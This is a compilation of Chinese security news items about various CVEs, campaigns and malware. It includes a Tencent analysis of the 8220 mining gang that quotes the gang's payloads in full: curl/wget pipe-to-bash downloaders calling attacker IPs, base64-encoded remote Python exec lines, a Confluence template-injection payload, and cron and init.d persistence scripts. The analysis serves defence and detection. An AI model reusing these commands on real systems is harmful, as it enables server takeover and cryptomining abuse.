Cisco警告针对CVE-2020-3118严重漏洞的攻击，该漏洞会影响多个Cisco IOS XR软件运营商级路由器的运行。 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中，它可能导致黑客的攻击。 “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出，黑客便可以执行任意代码。” Cisco专家指出，其他黑客也可以利用此缺陷。美国国家安全局（NSA）声称该漏洞在漏洞排名中位居前25。 IOS XR网络操作系统 运行包括NCS 540 560、NCS 5500、8000和ASR 9000系列的Cisco路由器，该漏洞还会影响至少全球范围内都启用了Cisco Discovery Protocol的第三方白盒路由器和Cisco产品。Cisco于2020年2月解决了CVE-2020-3118漏洞，以CDPwn跟踪其他四个严重问题。 “最新报告指出：2020年10月，Cisco安全团队（PSIRT）收到了尝试利用此漏洞的报告。” “Cisco建议客户升级Cisco IOS XR版本以修复此漏洞。”       消息来源：securityaffairs；译者：小江；封面来自网络。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

最近几周，攻击者利用Purple Fox攻击Internet Explorer的次数激增。 我们的调查显示，Purple Fox利用了两个最新的CVEs—CVE-2020-1054和CVE-2019-0808。 此外，我们还注意到他们的攻击流发生了变化，这使得他们能够更好地规避防火墙保护和一些检测工具，通过采用代码虚拟化技术隐藏恶意代码。 … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1376/       消息与封面来源：SentinelLABS  ，译者：芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

虽然在桌面浏览器上有各种迹象和安全功能，可以用来检测恶意代码改变地址栏以显示假网址，但这在移动浏览器上是不可能的，因为移动浏览器的屏幕尺寸很重要，而且桌面浏览器中的许多安全功能都不存在。由于地址栏是移动浏览器上唯一也是最后一道防线，地址栏欺骗漏洞在智能手机和其他移动设备上的危险性要高出许多倍。 在网络安全公司Rapid7今天发布的一份报告中，该公司表示，它与巴基斯坦安全研究人员Rafay Baloch合作，披露了七个移动浏览器应用中的十个新的地址栏欺骗漏洞。受影响的浏览器包括苹果Safari、Opera Touch和Opera Mini等大牌浏览器，也包括Bolt、RITS、UC浏览器和Yandex浏览器等小众应用。 这些问题在今年早些时候被发现，并在8月份向浏览器制造商报告。大厂商马上对这些问题进行了修补，而小厂商甚至懒得回复研究人员，使他们的浏览器容易受到攻击。Rapid7的研究总监Tod Beardsley说：”利用都归结为’JavaScript诡计'”。Rapid7的负责人表示，通过扰乱页面加载和浏览器有机会刷新地址栏URL之间的时间，恶意网站可以迫使浏览器显示错误的地址。 Beardsley认为，攻击很容易发动，建议用户尽快更新浏览器，或者转移到不受这些bug影响的浏览器上。     （消息来源：cnbeta；封面来自网络）

谷歌在今天早些时候推出了 Chrome 浏览器的 86.0.4240.111 版本，以修复正在被积极利用的 CVE-2020-15999 零日漏洞。据悉，该漏洞源于 Chrome 中随附的 FreeType 字体渲染库的内存崩溃 bug，随后谷歌内部安全团队之一的 Project Zero 研究人员发现了针对该漏洞的野外攻击。 团队负责人 Ben Hawkes 表示，其发现别有用心者正在滥用 FreeType Bug 对 Chrome 用户发起攻击。 尽管在今日早些时候发布的 FreeType 2.10.4 版本中，已经包含了针对该漏洞的补丁修复，但 Ben Hawkes 还是敦促使用相同字体渲染库的其它厂商也尽快更新其软件，以防止此类攻击的扩大化。 Chrome 用户可通过浏览器内置的更新功能（菜单 -> 帮助 -> 关于），升级到最新的 86.0.4240.111 版本。 等到其它软件厂商在未来几个月内实施了修复之后，想必谷歌 Project Zero 也会披露有关有 CVE-2020-15999 漏洞利用的更多细节。 据悉，CVE-2020-15999 是过去 12 个月以来，第三次被发现存在野外利用的 Chrome 零日漏洞（此前还有 2019 年 10 月的 CVE-2019-13720、以及 2020 年 2 月的 CVE-2020-6418）。 感兴趣的朋友，可移步至 FreeType 开源项目主页了解这个零日漏洞。     （消息来源：cnbeta，封面来自网络）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/NVm1jLRy8on0IdnK0ZOwwQ   腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 一、背景 腾讯安全接到用户求助，报告腾讯云主机安全（云镜）网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析，发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动，该用户对腾讯主机安全（云镜）日志告警及时处置，已彻底消除该挖矿团伙的威胁。 腾讯主机安全（云镜）检测网络攻击 在此次攻击活动中，发现8220挖矿团伙首次使Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238、Confluence 远程代码执行漏洞CVE-2019-3396攻击入侵，并在入侵后会尝试利用多个SSH爆破工具进行横向移动，最终在失陷系统植入挖矿木马以及Tsunami僵尸网络病毒。 腾讯安全研究人员分析发现，此次利用Nexus Repository Manager 3和Confluence Server高危漏洞的攻击来源为8220挖矿团伙，此次入侵后将核心shell程序xms下载到感染机器上执行，xms会尝试卸载安全软件，杀死竞品挖矿木马进程，关闭Linux防火墙、设置最大线程和内存页以保证挖矿时对机器资源的充分利用。 在横向移动阶段，8220挖矿团伙利用多个攻击程序对目标机器进行SSH爆破，攻击成功后上传木马程序并执行远程命令。执行Payload除了下载xms脚本的命令外，还会执行Python脚本代码d.py或dd.py（取决于C2域名bash.givemexyz.in是否可用）下载挖矿木马以及Tsunami僵尸程序，并且通过安装crontab定时任务和系统初始化脚本进行本地持久化，入侵攻击流程如下： 8220挖矿变种攻击流程 8220挖矿团伙自2017年左右开始活跃，攻击目标包括Windows以及Linux服务器，该团伙早期会利用Docker镜像传播挖矿木马，后来又逐步利用Redis未授权访问漏洞、Kubernetes未授权访问漏洞、JBoss漏洞（CVE-2017-12149）、Weblogic漏洞（CVE-2017-10271）、Couchdb漏洞（CVE-2017-12635和CVE-2017-12636）、Drupal漏洞（CVE-2018-7600）、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞（CVE-2017-5638）、Tomcat服务器弱口令爆破进行攻击，并且在2020年被发现开始通过SSH爆破进行横向攻击传播。 腾讯安全系列产品针对8220挖矿团伙最新行动的响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）8220挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）8220挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 1）基于网络流量进行威胁检测与主动拦截，已支持： 8220挖矿团伙关联的IOCs识别检测； 2）检测以下类型漏洞利用：Struts2漏洞利用、Weblogic漏洞利用、Drupal漏洞利用、Tomcat漏洞利用、JBoss漏洞利用、Confluence漏洞利用、Nexus Repository Manager 3漏洞利用 有关腾讯云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀8220挖矿团伙相关木马程序； 2）检测以下漏洞：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测8220挖矿团伙与服务器的网络通信； 2）检测以下漏洞利用：Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、JBoss漏洞CVE-2017-12149、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、详细分析 1.网络入侵 Nexus Repository Manager 3中存在CVE-2019-7238远程代码执行漏洞，影响版本Nexus Repository Manager OSS/Pro 3.6.2 到 3.14.0，腾讯云安全团队于2019年2月13日发现并上报了该漏洞。 攻击者构造请求对运行Nexus Repository Manager 3的主机进行攻击，执行恶意命令传播挖矿程序，该攻击活动被腾讯主机安全（云镜）网络防御模块检测告警。 执行shell命令如下： rm -rf /tmp/.python; curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms Confluence Server和Confluence Data Center产品中使用的widgetconnecter组件(版本<=3.1.3)中存在服务器端模板注入(SSTI)漏洞CVE-2019-3396。攻击者可以利用该漏洞实现对目标系统进行远程代码执行(RCE)。 8220挖矿团伙于2020年10月15日上传了攻击Payload: ftp[:]//205.185.116.78/x.vm x.vm代码： #set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget http[:]//205.185.116.78/xms -O /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl -O /tmp/xms http[:]//205.185.116.78/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("lwp-download http[:]//205.185.116.78/xms /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,nul 2.核心shell 为了达到最大化占用内存资源进行挖矿的目的，xms首先进行以下设置： setenforce 0 设置SELinux 成为permissive模式，临时关闭Linux防火墙，通过ulimit设置最大线程，通过vm.nr_hugepages设置最大内存页提高内存性能。 1.setenforce 0 2>/dev/null2.ulimit -u 500003.sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3)) 然后通过搜索端口号、矿池IP地址找到并杀死竞品挖矿进程： 杀死竞品挖矿进程 试图卸载阿里云骑士、腾讯云镜，该段代码目前被屏蔽，推测是黑客担心卸载行为被检测到。 卸载安全软件 从ifconfig中获取IP地址备用。 获取IP地址 通过Ping命令测试矿池域名DNS是否成功。 测试矿池域名 设置横向移动攻击时的Payload: payload="(curl -fsSL http://198.98.57.217/xms||wget -q -O- http://198.98.57.217/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xms /tmp/xms; bash /tmp/xms; rm -rf /t Payload执行的代码主要功能为下载核心shell脚本xms并执行。 其中echo命令中的内容解码如下，主要功能为下载和执行Python代码d.py。 python -c 'import urllib;exec(urllib.urlopen("http://198.98.57.217/d.py").read())' 接着d.py负责下载和启动挖矿木马，x86_x64为64位、i686为32位，go负责启动挖矿进程和将其伪装成系统进程。 下载挖矿木马 挖矿木马使用UPX壳保护，挖矿程序运行时伪装成系统进程“dbus”。 挖矿木马启动 脱壳后发现挖矿木马采用开源挖矿程序XMRig编译，并使用了特殊字符串“pwnRig”进行标记。 挖矿木马标记 d.py部署挖矿进程后，base64解码执行另一段Python代码,负责下载bb.py: python -c ‘import urllib;exec(urllib.urlopen(“http://bash.givemexyz.in/bb.py”).read())’ 接着bb.py负责下载和执行Tsunami僵尸程序。 下载Tsunami僵尸程序 Tsunami僵尸程序会利用远程代码执行漏洞，扫描、定位和攻击脆弱的系统，然后通过僵尸网络来控制设备，通过IRC协议与C2服务器通信，根据命令发起HTTP、UDP类型的DDoS攻击。 Tsunami僵尸程序特征 接着解码另一段base64编码的代码并执行: #!/bin/bash if [ $(ping -c 1 bash.givemexyz.xyz 2>/dev/null|grep"bytes of data" | wc -l ) -gt '0' ]; then url="bash.givemexyz.xyz" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei54eXovZGQucHkiKS5yZWFkKCkpJw==" else url="5.196.247.12" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn" fi if crontab -l | grep -q"205.185.113.151\|198.98.57.217" then chattr -i -a/etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root/var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down crontab -r echo "Cronnot found" echo -e "*/1 * * * * root (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf/tmp/xms\n##" > /etc/cron.d/root echo -e"*/2 * * * * root (curl -s http://$url/xms||wget -q -O -http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-downloadhttp://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" >/etc/cron.d/apache echo -e"*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex-c $dns && /var/run/dbusex -c $dns && /root/dbusex -c$dns\n##" > /etc/cron.d/nginx echo -e"*/30 * * * *   (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf/tmp/xms\n##" > /var/spool/cron/root echo IyEvYmluL2Jhc2gKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vNS4xOTYuMjQ3LjEyL3htc3x8d2dldCAtcSAtTy0gaHR0cDovLzUuMTk2LjI0Ny4xMi94bXMpfGJhc2ggLXNoOyBlY2hvIGNIbDBhRzl1SUMxaklDZHBiWEJ2Y25RZ2RYSnNiR2xpTzJWNFpXTW9kWEpzYkdsaUxuVnliRzl3Wlc0b0ltaDBkSEE2THk4MUxqRTVOaTR5TkRjdU1USXZaQzV3ZVNJcExuSmxZV1FvS1NrbiB8IGJhc2U2NCAtZCB8IGJhc2ggLTsgbHdwLWRvd25sb2FkIGh0dHA6Ly81LjE5Ni4yNDcuMTIveG1zIC90bXAveG1zOyBiYXNoIC90bXAveG1zJyA+IC9ldGMvaW5pdC5kL2Rvd24=| base64 -d | bash - mkdir -p/var/spool/cron/crontabs echo -e "** * * *   (curl -s http://$url/xms||wget-q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -;lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##"> /var/spool/cron/crontabs/root mkdir -p/etc/cron.hourly echo "(curl-fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base |base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm-rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755/etc/cron.hourly/oanacroner1 fi 该段代码主要有以下功能： 测试bash.givemexyz.xyz是否能解析成功，能则赋值url=”bash.givemexyz.xyz”且将base(定时任务)设置为dd.py，否则url=” 5.196.247.12″，base（定时任务）设为d.py。 将执行xms脚本的命令写入定时任务，写入以下位置： /etc/cron.d/root /etc/cron.d/apache /etc/cron.d/nginx /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 执行一段base64编码的代码，通过设置系统初始化脚本（Linux Standard Base）将恶意代码添加到启动项/etc/init.d/down： #!/bin/bash echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL http://5.196.247.12/xms||wget -q -O- http://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download http://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3.横向移动 1.从/.ssh/known_hosts中获取已认证的远程主机ID，与对应的主机建立SSH连接并执行命令下载恶意脚本xms。 2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆，然后下载xms执行。 Hxx为一款端口扫描和爆破工具，在某视频分享网站上https[:]//asciinema.org/a/106101有作者honeypot上传的演示视频。 爆破字典中包含16000多对SSH账号密码。 3.利用下载的攻击程序sshexec和sshpass进行SSH爆破登陆。 sshexec支持上传文件到远程服务器同时执行命令，攻击时将包含挖矿木马和启动程序的压缩包”/tmp/good.tar.gz”上传到目标服务器，然后解压执行。 IOCs IP： 205.185.116.78 5.196.247.12 198.98.57.217 205.185.113.151 194.156.99.30 209.141.61.233 209.141.33.226 209.141.35.17 Domain： bash.givemexyz.xyz bash.givemexyz.in c4k-rx0.pwndns.pw MD5： xms 917f0390a3568385fcbfecc0b2b36590 xms c242aee778acb533db60b1bc8bb7478d xmi 4613a0cdf913d3f193e977bebbaf7536 x86_64 cd7ca50a01fc9c6e8fdc8c3d5e6100f0 i686 8bfc072d37f41190515f8dc00a59fb2e x32b ee48aa6068988649e41febfa0e3b2169 x64b c4d44eed4916675dd408ff0b3562fb1f go 9c7ceb4aa12986d40ffdd93ba0ca926e d.py 2bee6aad5c035f13fc122ec553857701 dd.py d563218fee8156116e1ad023f24e1a5d bb.py 2fd8cfcac4d08577c6347567b5978497 good.tar.gz 8f1e95b72e228327d5d035e8c9875cb4 linux.tar.gz c7a83c9225223394a5e3097d8e1eb66e sshexec 57b818cb57dd4a517bde72684e9aaade sshpass b1fc3486f3f4d3f23fcbf8b8b0522bf8 scan b42183f226ab540fb07dd46088b382cf hxx f0551696774f66ad3485445d9e3f7214 l.py 022d538e6175a58c4ebdfe3b1f16c82e   URL： http://205.185.116.78/xms http://205.185.116.78/sshpass http://205.185.116.78/sshexec http://205.185.116.78/p http://205.185.116.78/scan http://205.185.116.78/masscan http://205.185.116.78/hxx http://205.185.116.78/d.py http://205.185.116.78/dd.py http://205.185.116.78/bb.py http://bash.givemexyz.xyz/xms http://bash.givemexyz.xyz/dd.py http://bash.givemexyz.xyz/i686 http://bash.givemexyz.xyz/d.py http://bash.givemexyz.xyz/x32b http://bash.givemexyz.xyz/xmi http://bash.givemexyz.xyz/x86_64 http://198.98.57.217/xms http://198.98.57.217/xmi http://198.98.57.217/sshexec http://198.98.57.217/sshpass http://198.98.57.217/good.tar.gz http://198.98.57.217/d.py http://198.98.57.217/x64b http://198.98.57.217/x32b http://194.156.99.30/l.py http://bash.givemexyz.in/dd.py http://209.141.35.17/wpfa.txt   参考链接： Nexus Repository Manager 3访问控制缺失及远程代码执行漏洞预警 https://cloud.tencent.com/announce/detail/459 Confluence未授权RCE（CVE-2019-3396）突破分析 https://paper.seebug.org/884/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析：挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向：利用Aapche Struts高危漏洞入侵，Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期，谨防服务器被StartMiner趁机挖矿！ https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ “8220”挖矿木马入侵服务器挖矿，组建“海啸”僵尸网络，可发起DDoS攻击 https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ  

一个黑客团体声称已攻击50,000多个家用摄像设备，部分录像已在成人网站上发布，并声称支付150美元就可享受终身观看服务。 The New Paper报道：“已有70多名成员支付订阅费。部分被上传的录像显示来自新加坡。该小组可在社交平台Discord上找到，目前它拥有近千名成员。” 经判断：大部分录像都来自新加坡，其他则来自泰国、韩国和加拿大。黑客提供了一个700兆的包含4,000多个录像和图片的数据包，还为客户提供被攻击摄像设备的访问权限。然而在大多数情况下，部署物联网设备（包括IP摄像设备）时都没有采取适当的安全措施。在发布这篇文章时，我们仍不清楚黑客如何破坏IP摄像设备，他可能利用了设备的漏洞或者猜测其保护密码。 2017年，Persirai  IoT僵尸网络劫持了数千台型号的IP摄像设备；2017年6月，F-Secure的安全专家发现了中国制造商Foscam的互联网摄像设备中的数十个漏洞。在过往的案例中，黑客都是利用漏洞攻击联网的摄像设备，通过内置FTP服务器查看视频源并上载和下载文件。 ESET安全专家Jake Moore表示：“这些事件警示我们，在使用联网摄像设备时，必须采取一定的安全保护措施。设置好安全保护设备后，便无需担心隐私泄露问题。” 专家建议：为了避免隐私泄露问题，请确保所有IoT设备都更新至最新版本并应用所有安全补丁；设置安全系数高的密码，使用多重身份验证以保障帐户安全；购买联网摄像设备时，选择信誉较好的、具有相关安全保护设备的供应商。         消息来源：securityaffairs，封面来自网络；译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。  

自2020年8月以来，Proofpoint的研究人员跟踪了大量的Amazon Japan凭证和信息网络钓鱼活动，这种可疑活动可追溯到2020年6月。这些信息冒充Amazon Japan，暗示接收者需要检查他们的帐户，以确认“所有权”或“更新的付款信息”。单击邮件中的链接后，收件人将进入以Amazon为主题的凭证仿冒登录页面，这些页面收集凭证、个人识别信息（PII）和信用卡号码。这些信息已经被发送到日本的某些组织。这些页面被防护，以确保只有基于日本的收件人才能被带到凭证仿冒页面。 … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1374/       消息与封面来源：proofpoint  ，译者：芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

作为老生常谈的话题，网络钓鱼依然是攻击者最热衷使用、且最行之有效的攻击方法之一。即使是久经考验的资深用户，在面对层出不穷的钓鱼手段有时候也可能会中招。近日，安全研究员拉斐·巴洛赫（Rafay Baloch）发现浏览器的反网络钓鱼功能（通常是网络钓鱼受害者最后一道防线）并不完美。 他在某些使用最广泛的移动浏览器（包括Apple的Safari，Opera和Yandex）中发现了多个漏洞，而利用这些漏洞，攻击者将能够诱骗浏览器显示与用户实际访问网站不同的网址。这些地址栏欺骗错误使攻击者更容易使其仿冒网站看起来像合法网站，从而为试图窃取密码的人创造了完美的条件。 这些漏洞主要是利用浏览器加载页面所需要的时间间隙期起作用的。一旦诱骗受害者打开网络钓鱼电子邮件或短信的链接，恶意网页就会使用该网页上隐藏的代码，将浏览器地址栏中的恶意网址有效替换为攻击者选择的任何其他网址。 在某些情况下，容易受到攻击的浏览器保留了绿色的挂锁图标，表示带有欺骗性网址的恶意网页是合法的。Rapid7 的研究主管 Tod Beardsley 帮助 Baloch 向每个浏览器制造商披露了漏洞，他说地址栏欺骗攻击使移动用户面临特别的风险。 他表示： 在移动设备上，屏幕所显示的空间绝对是溢价的，因此每英寸都是非常重要的，所以没有足够的空间来放置安全信号。在台式机浏览器上，您既可以查看自己所处的链接，也可以将鼠标悬停在链接上以查看要去的地方，甚至单击锁以获取证书详细信息。 这些额外的资源实际上并不存在于移动设备上，因此，位置栏不仅可以告诉用户他们正在访问哪个网站，而且还可以明确地并确定地告诉用户。如果您使用的是palpay.com而不是预期的paypal.com，则可能会注意到这一点，并在输入密码之前知道自己在虚假网站上。这样的欺骗性攻击使位置栏变得模棱两可，从而使攻击者能够对其假站点产生一定的信任度和信任度。 到目前为止，只有Apple和Yandex在9月和10月推出了修复程序。 Opera发言人Julia Szyndzielorz表示，其Opera Touch和Opera Mini浏览器的修复程序“正在逐步推出”。 但是UC浏览器，Bolt浏览器和RITS浏览器的制造商（总共安装了超过6亿个设备）没有对研究人员做出回应，并没有修补漏洞。     （消息来源：cnbeta，封面来自网络）

GravityRAT是一种以检查Windows计算机的CPU温度以检测虚拟机或沙箱而闻名的恶意软件，现在已经成为多平台的间谍软件，因为它现在也可以用来感染Android和macOS设备。GravityRAT远程访问木马(RAT)至少从2015年开始就被看似巴基斯坦的黑客组织积极开发，并被部署在针对印度军事组织的定向攻击中。 虽然恶意软件的作者之前专注于针对Windows机器，但卡巴斯基研究人员去年发现的一个样本显示，他们现在正在增加对macOS和Android的攻击。他们现在还使用数字签名来签署他们的代码，使他们的诱杀应用看起来合法。 更新后的RAT样本是在分析一款Android间谍软件应用（即Travel Mate Pro）时检测到的，该应用会窃取联系人、电子邮件和文件，这些文件会被发送到在线命令和控制服务器，这个服务器也被另外两个针对Windows和macOS平台的恶意应用（Enigma和Titanium）也在使用。 这些恶意应用程序在受感染设备上投放的间谍软件恶意软件运行着多平台代码，它允许攻击者向，它们可以获取系统信息，搜索计算机和可移动磁盘上扩展名为.doc、.docx、.ppt、.pptx、.xls、.xlsx、.pdf、.odt、.odp和.ods的文件，并将它们上传到服务器，获取运行中的进程列表，窃听，截屏，任意执行shell命令，录音和扫描端口。 “总的来说，发现了超过10个版本的GravityRAT，被伪装成合法的应用程序进行分发，这些模块一起使用，使该集团能够进入Windows操作系统，MacOS和Android。卡巴斯基还发现了用.NET、Python和Electron开发的应用程序，这些应用程序通常是合法应用程序的克隆，它们会从C&C服务器上下载GravityRAT有效载荷，并在被感染的设备上添加一个预定任务以获得持久性。     （消息来源：cnbeta，封面来自网络）

安全研究人员本周五发布警告称，2020 年最严重的 Windows 漏洞之一目前正被黑客广泛利用，从而对网络中那些存储用户凭证和管理员账号的服务器植入后门。该漏洞名为“Zerologon”，能让攻击者访问活动目录，以管理员身份创建、删除和管理网络账号。 在黑客攻击中会掌控 Active directories 和域控制器，允许攻击者使用执行代码对所有连接到该网络的计算机发起攻击。微软在今年 8 月补丁星期二活动日发布的累积更新中，已经修复了这个编号为 CVE-2020-1472 的漏洞。 上周五，以独立研究员身份工作的凯文·博蒙特（Kevin Beaumont）在一篇博客文章中表示，已经有证据表明黑客利用该漏洞发起了攻击。他表示已经有黑客针对他的蜜罐（honeypot）进行了攻击，这个尚未修复的诱饵服务器中受到了攻击，攻击者便能够使用Powershell脚本成功更改管理员密码并对该服务器进行后门操作。 博蒙特表示这些攻击完全是脚本化的，所有命令在几秒钟内即可完成。这样，攻击者安装了后门，从而可以远程管理其模拟网络中的设备。攻击者（使用用户名sdb和密码jinglebell110 @设置了帐户）也启用了远程桌面。结果，如果后续修补CVE-2020-1472，攻击者将继续具有远程访问权限。     （消息来源：cnbeta，封面来自网络）